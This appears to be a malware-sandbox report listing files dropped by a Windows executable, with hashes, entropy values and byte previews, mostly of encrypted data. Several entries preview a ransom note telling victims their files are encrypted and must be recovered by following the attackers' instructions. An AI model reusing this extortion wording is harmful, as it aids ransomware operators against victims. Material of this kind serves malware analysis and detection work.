..j.\.....&..D..uN!.g...l.k*......./..X..M.O.#7&o.8......R.l.>...{..-.Y.=..I.P.-.#.E5....[.....%*...<.t.U.'...L8.T.j1.9.....2..C....k.A@S.&n.u..Z.P.g.X`e.2.F......l..3........l.0...9.R*.Y.Y..i.....x.-S..j#...5..~a.3.5..B".+.......u.....3...[.+Z...h.......2...J.x.?~m;......`..g..Q..".!...r.a..o+CjO.jGg'!].M.!g.9...TI\..M)...%...lx..&..|*-Ks.N.>.U1L.b.w..L..............C....n...z........RT....%F.....~.2'#..t.X4...|m.,.i(*?.v..?8.I...qd..n6..).#zt..f\.]..K..{0.C..vJ8...Z..N.0.E.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.863645001273469
                            Encrypted:false
                            SSDEEP:24:fh6dfnfSCTR9XJSEH11dLQuSdeE8Ly5bsAvZgFSrlGiQacmVm:ufzDXJSEHjdMu35y5JRgFilhQ6o
                            MD5:61FAC8E7545694313920E0537B935787
                            SHA1:EB3D1CA607A3531021B0930191C80A77DE70CF4E
                            SHA-256:8538325243001CC0559C4F7A885ADBE1C433AF8FB4220E12B8E6EA1369204704
                            SHA-512:9A4F41E7090A5348DBEA4400877FB3388F0A6B8424FE55B50D8EB2F9471701DFB2B783D5E1FC745B3BBE3E8BA24735217568AE6020ADD87C335A03668C120AB1
                            Malicious:false
                            Preview:.Y.$..D'..8.x.R(...N.mz...\......m(5..k..Rf...e{..c) .72q<K....Q..../._...M.g...a....8.5.|..!~.>..F=..[:..X]Rj.;D.k4M.([<...tW.......FOJDFt.]!....(.3..N...oH@0.......qQa. Z..w...5.....+.@>.rS o.L..(.*.t.......G;...........r....p.........~.....d.h.27M.p.......yLH.se..z.G..........#.j`.....s.G.......'..H..Z.}.X.o....P.nw.WJ....."...>..'./.~.%X.U.......q......d...|k.2.Sn.z.A..}I....-H..m..)@....u}..c..;$jD".*!-\..F..7...PEUR_.....j.g..g.@..+..c....F*...7^.............>E....S.@5.P6.'...IDl...s.Y\..\>..)...dcH.....r...Q..D.hof....]YcT....0u..8....f....d.cS...q...^_y..........};F....fE...^s.~.x..dEb.A.]Y.X..6o.....`/....x.Gi.?i.W.@Z.2...b..C...+N...d...Y..-....6.7..!..U..h.:...[..........I.....M.a.\u6..(.}2.....K......|..i..N..iY%;....Z..r)..n.;.q..J.>.S;........A..x^7..l-...S....Y.z...c.~Z5.Q.+RA:$........'h.......(..(.T..v'.f.p'.j.ypj../.MZ-.....U:.......w..,..]0!z...J{c.c..K.h....8.....R.....g.q.R.jY(-..F'}.[..=+.la.Z..JT.,..../66..N.......
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.831819573019909
                            Encrypted:false
                            SSDEEP:24:2tH0L3WUY9vWuyhnbC8gy5x8wcDQwqgEYNYttCfNSlGiQacmahu:oHH99vWnhnW8txeQStNYCNSlhQ65
                            MD5:97470922F1410D515FFF3B442E6CE503
                            SHA1:6836EA462CF9ADD2DE4F72BEAC4C8C260ADE2BFE
                            SHA-256:8408BC9F47C0343CA8CA10955946E4C365C5CD42559EF4D0F23A3E856B5444DB
                            SHA-512:6F957E62980AB21B011F0D298FC6497DE48EE4149C9B32AE7E763669143D70BBA631AB87875077F2FAC290EBE4E08DFD29C71AE39D8EFE734F00058A5AFC6E9C
                            Malicious:false
                            Preview::U.J....p..=..6..I.......}.X..?.fS..Q5..0.Y..f.+..........`HD..'.(..,. ......j.[E..dU.C.{.r'.u...........([gu.WV.O.j..I}v..).;m...L..63..E.{.2.:Y3...[.5."......!..A*....e3(.lacE'.%X.g....x.>....).Gm..|...........=/~K..N@.1o..?.>.8sn.X...7..S.sadM~...[69H.Ow...=8...D..2ab^Q.-..`.*D..D.i0..:..y&!.H..n=..0.Rp......&OT..r..1g..@..!.U.K......!..8:Mj..Kf6.W.bVn'.V@2.-.....&.%....g.Qwz.P{.O.@h..DW.}......I.....R.....PN_..%...M./..=~.....?..<{.`..e..p.<.k.Fp....c-8.x.R.....j..A.\...Y...`..........y....2..&...(..=.T..p...W..R....mm..?1.W.....6.oN.,H.g.......1...(...`.V...D..x.b4..^b3.................@/~.f.1}......(...........<...9Y...Z.*.T...rK.......~s..34yF.'...#.|.D.....8..,......Wm.?...v...?..q.|..S.....q].....T7.....e.!_.C.AgqV.Q.a.....RH}.T.+M`..\-.1.. ......?XK>........!l....jy....s.x.`.H.z.!.u.....6..>.>..Jx....).`..X+zm,.Gs..po/2..\..k2.J.=,..n.!.....rw.0U.6.@|!...s.....g9,ff.`. .sn..E..VO..D.......S..?O.H.i........=N_...p.....&.X.jW.v5.-...."
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.838800576606332
                            Encrypted:false
                            SSDEEP:24:d9D3vcWJfZIvrhII8IQ/B8wL+vYfcFHi78ZqDtsziEE7+tXBz3M60lGiQacmHFmX:XD3vrBZIvrh+IgObFHiRWXrv0lhQ6HFY
                            MD5:056A3973DFDB2E86F6FF237988E052EB
                            SHA1:B9F2F2326C0860FD3BE02121FDE5E2AFF4AD80ED
                            SHA-256:FA394A30672531B27730707231D96C15B548480A69633124BA59C102A6E33AB8
                            SHA-512:F70219199F57553CE5DF63B6D92105BA089C6D38A3B3D0BB344954094D66D9214F3A9F62312D3024E11317F0E5D1DE0F69A505FB151858CE4F1B97A03DE9F55D
                            Malicious:false
                            Preview:.b.......C.]....L.....d....~.]..iDk?.|.....n..3...*M.N8x.\...B...ZC....2..P......"w.%..".G_'..".4...3....$.....X.....Nuo....-.B'D.*..3.bJy...Z.]...4....4X.(.G....hn)..Cg...$-6.E*...@../...T.Z<.CN[0h..+h./NB./..,.........@.3%..|'.&.0..R...e6|..0..$R.....[9...C.;.h.{.T....<.3.:......6..!8.2......../.>.Y....<.Ue.?...Y.+....KY..r..J.THwY...../.P...tN.k..FfF.^..Wv'..N./..a.o..r....sXe"k.....D....@.[d..n$.1.%....s.M.Y>w.s..btq.\..z....~|..U.l.nru.T.....r..7...~..W..D...%..... .3%/..G..^1..Q.............iDK.PX.0.e..BD..:..^..Y.P.{.jI.c...i|...O>.t6......)b...o.w..l.\..o...%..;.E..!.p.+p..R..MD~.i.q.0g.%.3.O....f.`......C...".-O.B.p-...8.|..-...<:..^x.TuN.q+G.|.:eF......r.s......o..#...d...R..y[..c{K.c&.xu....Bql..U.Li^.$.....&.]9U..:D........U..@.B.F......A.LW.*mTu..#...+......q...%...h..P,R..s,.8...uO~....Ksgy...m...&.{.l....;I/..a.AQk^j.Ko.NI4...IJR....s=F...U.\.q...W9.......g..GC.X...E..}.v.W..{...v4.9V6.q.i..3...p.G..n.;&.[.p#.4....%.i...."
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1250
                            Entropy (8bit):7.860791505608526
                            Encrypted:false
                            SSDEEP:24:6R+iO5iEjUdRj48De9PdatoZwTMakNVMpEKrIONfnHkapeXlGiQacmPl:R1iTRjQ7wpNrIOhnHkap+lhQ6d
                            MD5:538F891144AE42C35F9B42C1A7437294
                            SHA1:A5E1268CDC7EC8CCDBF96E13C68B200D6D742E4E
                            SHA-256:00A97CA28686836D8253CC46BC8E37392810423A5D7DAF6D9716CCCDC5533F8B
                            SHA-512:32FEFEA0E954703C12CB81C977002AB1473391558FF7CEFDE585BDD6563E6E072AEBEBFB6126E71A0F136CBCEEA754B48E5AC12AF672A6E07D8C119961969E86
                            Malicious:false
                            Preview:..3.x.Z.{..%.....T.W..0.oS.|=g.EdR]..".s(B..,......`.`|c.W..@.Q];w.{.@.o..&.}..1~.b......ji.@$$..;...EC`i...})a+2.../.{....b.w..U.'..i.. W.Q.y..p....>.S.....~p..o..fW=..Q...XK..:.F0JR.O..._.|.M....~.....{Q.n.....%..w...m...v...kQ.]..M.<...^=M.}.gx.....4;b...-..6X.V.;J\.U..r;].M.>.j?g...!..YT.k..=....O....t...@..../...6..@.L.Scq.4..1r].i.z.E...q....d...u....V1{.......Fh.D6{.N..v.6........:....B.....h...j..<W.."K..joX..!".{....LU..X.y.3W.m...B......*..Y..(./...^|..............9.8C/*%=......v_O.I0..P"..d..).g5....zD.R.c..%..ww%.mH.*...z...5.........%.8..'|i....D..0....(Q.....@...ku..|....Xr.....".?S$...W.~.}.)..S.........:...3.#..@....._)....G.....a.......XB.8..H..!.N.~..n}j.[u_..pam....XZ...V...!...F...Cj=..'...M...i"1...:.hu.|.N..m.O.mR,OUt...un.'1......l)..)hm6Y. q\.#>.Y{.O......+wK#.@..*....R......q.(1..`.;S?.l.....m.v.........S.FV=..&En.08.....[..6.....f..E..Q..S_..s..D,......?....6N...dlx....v<.u.dFu....].{$q.v9.^q.....6.\...C&X.H.`"
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):335
                            Entropy (8bit):7.371238797237861
                            Encrypted:false
                            SSDEEP:6:LWzqqdz9sgI7ad0VS1J/OuPMPN9+8lGq3L8acVEnj+YBuTxgClfY9ctqC8Brhbtn:mL9HI7CToPN9DlGiL8acSjfuT2RQq3rT
                            MD5:E60D477E668DE7F9836AFC044A5B396E
                            SHA1:742BF9C3CE8489C4D9DF3218FAF303269A1203F5
                            SHA-256:946B2A73AE27BF4DC46982290C6FFEEC6E236A4A8FB68671F70F4267BCFBDCC3
                            SHA-512:105E39B50D581E2294FF3C69FFE785E67625FD94C1A0A86194D830075EC01DF1BC65EA0230274618D8D245556D6BE6C549F2D6C73AF00C4BF0C6BAC728544202
                            Malicious:false
                            Preview:m..Urc.Q.Mn-.(..R........I7.A.....}{_...|.....)N..........`zG..V.6...G..z.|.96.FQ1..e.W.u....G.dG..I.T^..........>.Le..pX.31...@-...02....v..J.`a.%e..B$.O]q&....n.Lw.(.3.@A..R.S....30).....f..b..Y.,.X...<..E...7...QU9...#.n.......|.w.M'.......W..Z....3_L..4.a...)D. K.R...q5>....;.N....L.g.L.-\....gA..>V$..V..V7....
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):432
                            Entropy (8bit):7.498237287020362
                            Encrypted:false
                            SSDEEP:12:ICAwNHV0Q1Kw314PN9DlGiL8acSjfuT2RQqN1kw0J:IL6H51Kw3MlGiQacmbOJ
                            MD5:69CFD387B19D2CE7FDF92E631251C40B
                            SHA1:488449EAB885E75EB38BAE4D7A65B83B54BE680F
                            SHA-256:5096D59BBC16AB211E721541BAD4CB8BA59C38BFE32282EC3709FFA6CB688D19
                            SHA-512:9081E4E3B512537C053203559362588397586C4389CE98A27AE13920F93A00E55C8E8A1654D6C148AF2435E9A94C1F36F8580B5CAEB7FB17C7F535968DFB4A47
                            Malicious:false
                            Preview:m.v..A.#..E.!m.......[Oq...@..V.s..A...VJ..A........wO.K.V....uN0]>k...j.J[.T!..\..|P.=.g.......d..K.l.2J.\_c. .)IY...~.n....#pO....A.....:+i...@..%..............2...[cu5.uI......E.`..PZPR.O%...0...........>.Le..pX.31...@-...02....v..J.`a.%e..B$.O]q&....n.Lw.(.3.@A..R.S....30).....f..b..Y.,.X...<..E...7...QU9...#.n.......|.w.M'.......W..Z....3_L..4.a...)D. K.R..QvO/.A.t9.B..-.-zF..%...3.k....#1..&...%B.h....
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):337
                            Entropy (8bit):7.392580653557369
                            Encrypted:false
                            SSDEEP:6:b1Fk5gzUjEytyTZSk5/5y7vcD7OuPMPN9+8lGq3L8acVEnj+YBuTxgClfY9ctqIv:b1uCIjECyV7uMQPN9DlGiL8acSjfuT2i
                            MD5:920F37E1F3B92AD333701E983BFE2256
                            SHA1:3325835D8FFAE3EB78A617289C6B712B9B82DC5C
                            SHA-256:64FD45C4FE3A410DAB40DECB14BB0E794E72332F5EA3BAA81548F056C0D63DD6
                            SHA-512:1312B12FB908811BCC28F979CCF5FF94F235F1436B12637D87AB60A93BB05EEA6DCCFC5ED5D62F188B254EF8945CDA2580E61C81301D120FB359475A0592DE57
                            Malicious:false
                            Preview:.'?<.P.5.~^...LJ...U.{......u..NV.l6.g.nQ.+.E .....$s...2.w...9c.W......N...~o..` .i........./.$\.=..(R.............>.Le..pX.31...@-...02....v..J.`a.%e..B$.O]q&....n.Lw.(.3.@A..R.S....30).....f..b..Y.,.X...<..E...7...QU9...#.n.......|.w.M'.......W..Z....3_L..4.a...)D. K.R..rz~.@e..$r.\...s.YN....|.Bb...]...w@....aE....
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):335
                            Entropy (8bit):7.36977543904182
                            Encrypted:false
                            SSDEEP:6:ukoyE8cKjjBXaIY6OuPMPN9+8lGq3L8acVEnj+YBuTxgClfY9ctqjVMO/GOLU/:FzcU1a39PN9DlGiL8acSjfuT2RQqZxOh
                            MD5:E1426C80CC8D2EE2CCB3803468A9D3C1
                            SHA1:1B52A850830E874D5888CF2F34F69718DFAF0ABF
                            SHA-256:DF3D88B04AB68CA672629D7E1B871F7C95AE1F385F1502E2B2B3DE0E28B4A4B4
                            SHA-512:E7E327F6A31C5965BEB2A83FEA45FA377ACC70083A6C95457C266ED52A4902309603B0E6FB13C761C1BCE1463A71D4EC96EF356F7AE52A1A646FC7072A4F95FA
                            Malicious:false
                            Preview:..~.....6.{. .H...\Y..4...s....6^t.6...0s..0.CNP.w.vJ.....N..5.....2HW....x..yl$...Sk.s......).Ve....38...........>.Le..pX.31...@-...02....v..J.`a.%e..B$.O]q&....n.Lw.(.3.@A..R.S....30).....f..b..Y.,.X...<..E...7...QU9...#.n.......|.w.M'.......W..Z....3_L..4.a...)D. K.R... ...r..1J.6v'.h,.}..hL.`...x.M.F..N.{.pIH....
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):333
                            Entropy (8bit):7.318567604311414
                            Encrypted:false
                            SSDEEP:6:zuKBv8lRXRsEV6X3fqdIIKGy77OuPMPN9+8lGq3L8acVEnj+YBuTxgClfY9ctqfC:zutLXGEVonIKbQPN9DlGiL8acSjfuT2k
                            MD5:BB0E5FBA04CD7F1B1767F94D1975D80A
                            SHA1:908800514919C2D83F568405AA3B5B0E29DCE884
                            SHA-256:0F654D2C655D52792460521CCCF2D4DF36FFD2FA9D89A71893306A5E87BB4FEF
                            SHA-512:4491ECBCCD48954D175A0B31D5F730D77D113CBB0E21DC376654A38814ED1A7F1C8D8F40B8BC05ABCDF92EE7DB43B397ADDDB6DC4C80B5069CC1E34306852F7B
                            Malicious:false
                            Preview:...t.G.y[..g...Jl.:....1.B..>.\'.....6..9.L.<....n@..6R.a.S..\L..)..oE&i...\....$...g.mX..o.Z..IF+. ..#.T............>.Le..pX.31...@-...02....v..J.`a.%e..B$.O]q&....n.Lw.(.3.@A..R.S....30).....f..b..Y.,.X...<..E...7...QU9...#.n.......|.w.M'.......W..Z....3_L..4.a...)D. K.R...w....ZE]....6t0I$.)..<.>.Q.?...B!. ...;BoFz....
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):336
                            Entropy (8bit):7.350868995794918
                            Encrypted:false
                            SSDEEP:6:iOt3Xvd6WqM2vuhHCAr+uOuPMPN9+8lGq3L8acVEnj+YBuTxgClfY9ctqFGEMJDr:iOtvdvjY4HkBPN9DlGiL8acSjfuT2RQF
                            MD5:A6E3DBA963AD93184C0DA9E7305A5998
                            SHA1:E2177BA751AF0739581203A48BFC4D7D6852884E
                            SHA-256:8B4AD7E61D90E65184B05B31F8DD1E10ECB9DBEBECDB9E65B832251C08A3BE01
                            SHA-512:2324A13FC6B50A7363B085667CD6379503E8DB5CC8238BB040B6C4C1C6C58E6D0B2BE159BB0252FA2799F8155D7A92850952D2AA92C5B1A2D411BD4871FF6A41
                            Malicious:false
                            Preview:.R..N....|;.Ou%N|.JK......sj.... .Y....1/.....L.6.H.Z..*....f..?...J-8..?..vV.$.A....fQ...N....x|]...K............>.Le..pX.31...@-...02....v..J.`a.%e..B$.O]q&....n.Lw.(.3.@A..R.S....30).....f..b..Y.,.X...<..E...7...QU9...#.n.......|.w.M'.......W..Z....3_L..4.a...)D. K.R..N.32.8...)Ss}#.Y.....R").B...?.-.n.i.....j....
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):335
                            Entropy (8bit):7.398336025592478
                            Encrypted:false
                            SSDEEP:6:mt2DV7qX9YyUv4F4bcfOuPMPN9+8lGq3L8acVEnj+YBuTxgClfY9ctqYIHMFJy1/:02D099204bc0PN9DlGiL8acSjfuT2RQw
                            MD5:1108D595ED481570BD3561108A8F2CCF
                            SHA1:38D4AE3056BC49D0244D8AEA523A3ADA9367910B
                            SHA-256:D94953D560258D675656DD9D2228E0FA9F385201DE5CA8409F88D87058960F42
                            SHA-512:00DBB5FC5755CA1EB645AE294C2D45E73A4886CC9E193F761B3D8E25DDC8121EB727D30C4A3F27548A3012B4C84266CC7DF99ED806104C45F5870E0A7B67B2A0
                            Malicious:false
                            Preview:B.x c.vq.QS..Y~3[)...jD7..2R.y...C.qJ.....U.T..]K.[...ci...JB..r{O...Y.....g.....z..;Z..$l.....Y.....35]............>.Le..pX.31...@-...02....v..J.`a.%e..B$.O]q&....n.Lw.(.3.@A..R.S....30).....f..b..Y.,.X...<..E...7...QU9...#.n.......|.w.M'.......W..Z....3_L..4.a...)D. K.R...V..--.............|5s...w..D. TBfH).z.*$....
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):336
                            Entropy (8bit):7.405034861688427
                            Encrypted:false
                            SSDEEP:6:3wAu8o0HXDmh4r46dpUsOuPMPN9+8lGq3L8acVEnj+YBuTxgClfY9ctqheaY4uAb:3nouDmrWyPN9DlGiL8acSjfuT2RQqhe+
                            MD5:B7F98F9E3AF3EF95EA4B810F99D71D72
                            SHA1:FF1BCCD5D143B0D54F15197792FC1591559D1E70
                            SHA-256:61B621ED5E2CFAC51C4B5D3B84F2F71A72182EC0782E7131BA008B50E2CB1EF1
                            SHA-512:741983E94784D8EA880670E34801F9D8B36A385A25128721D0EEFE5885CBA40C3D3E696AC444CC062323635A87A0EC18CAF0F79832350395692DF878BAE07A8C
                            Malicious:false
                            Preview:'^.......i.q..x.V.lW...S....O.N3....#.w..B..m.v.(.g......i..f.`G..~...e.^B|.".`.].g.&..~7.....^...PBq.*6............>.Le..pX.31...@-...02....v..J.`a.%e..B$.O]q&....n.Lw.(.3.@A..R.S....30).....f..b..Y.,.X...<..E...7...QU9...#.n.......|.w.M'.......W..Z....3_L..4.a...)D. K.R.....6K..P....?Yv...q..?.\.4...uE.vi*..........
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):338
                            Entropy (8bit):7.386733210131716
                            Encrypted:false
                            SSDEEP:6:Uu2rLbFaf8C+T9+tybLMbdB7BOuPMPN9+8lGq3L8acVEnj+YBuTxgClfY9ctquDP:UuCiM9+tysyPN9DlGiL8acSjfuT2RQqI
                            MD5:7960411530F933811A5B2AD54DCBBEC7
                            SHA1:83914FAACAEB931CBB7FA2424059D4995A2E92B5
                            SHA-256:31076B57C6D56B4FAE4E46E94077A65676E5C146A3858480FABAC25B0CC851E8
                            SHA-512:FF70C7AC50E12AE2650E61756B03F906B7DB169A06B803315CC44282F4C99A2B31C31BEA596311722AEBACF9CF8D71B60C193E0A3E784BFAEE49ED527E283E57
                            Malicious:false
                            Preview:=.h..+%LU...z......7..I....yKy.....lS...d<.r...X....g6.W1~,W...3..yK.)6n..ZL.).&SW{.9.^...._..3......u.m.B:X..........>.Le..pX.31...@-...02....v..J.`a.%e..B$.O]q&....n.Lw.(.3.@A..R.S....30).....f..b..Y.,.X...<..E...7...QU9...#.n.......|.w.M'.......W..Z....3_L..4.a...)D. K.R..'.`G|.d....!2..*....O.......h...e<K..I.......
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):336
                            Entropy (8bit):7.31491380532684
                            Encrypted:false
                            SSDEEP:6:YCoY8fOwTZdQiz6F5iOuPMPN9+8lGq3L8acVEnj+YBuTxgClfY9ctqwfW:YCodAF5VPN9DlGiL8acSjfuT2RQqwe
                            MD5:3CD6D84581D0392B7EA7DE2F47F91240
                            SHA1:98F913DCBCEEC44DE88A74C70BF71E837BEE3062
                            SHA-256:8B8B2050EF2684455C2C3DA2FBDF5FD6D37D0841E354193AB482D43DAA9F0109
                            SHA-512:2EF93E44DAA99087A07B982ECC800D498D6C752B08C82AEA485700BF20B01909BA099C1F3E31BF3400D4F6F93C6445E2272C991566F82F63FFF419A978B93063
                            Malicious:false
                            Preview:...H...=9......M7...79_/.:.!.vY.`.....DM..Z&cm..0.g........eD..;J......x).g.D+..zr......m..TQ.P.#AQ.|.<...........>.Le..pX.31...@-...02....v..J.`a.%e..B$.O]q&....n.Lw.(.3.@A..R.S....30).....f..b..Y.,.X...<..E...7...QU9...#.n.......|.w.M'.......W..Z....3_L..4.a...)D. K.R..J/.SD.a..w./.."......m@.!w.Tg.k.JC._T.?...@....
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
                            SHA-256:55077AEAEB946594FFC07DAFC6D9BF2556028D1712EB4613F6886B50E4C24A7E
                            SHA-512:A8927B577C40A8C5575B69186FD95AFEB003E3DA46AF92AE4DD9ED51BA60422D75AFB9ADAB6584A13BD310D3AF01B3EF16D2EA16AD3F63701019E7597FDCF5D0
                            Malicious:false
                            Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .9.8.5.d.r.m.9.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.b.o.d.
                            Process:C:\Users\user\Desktop\RQzHm5vLxs.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6680
                            Entropy (8bit):3.8419680745916676
                            Encrypted:false
                            SSDEEP:96:GLjiNsg3xU3TPTfI32yY+GTKw4R/N7t4p2nqIt6ixOZbYd9PrR5u:GLjZ3jrI323/uR/UknLQFZkDW
                            MD5:C4AE8614F7DD1E8F9474903596B17D0C
                            SHA1:419F30931FEF8DEF258C45AD2712E436AE35791D
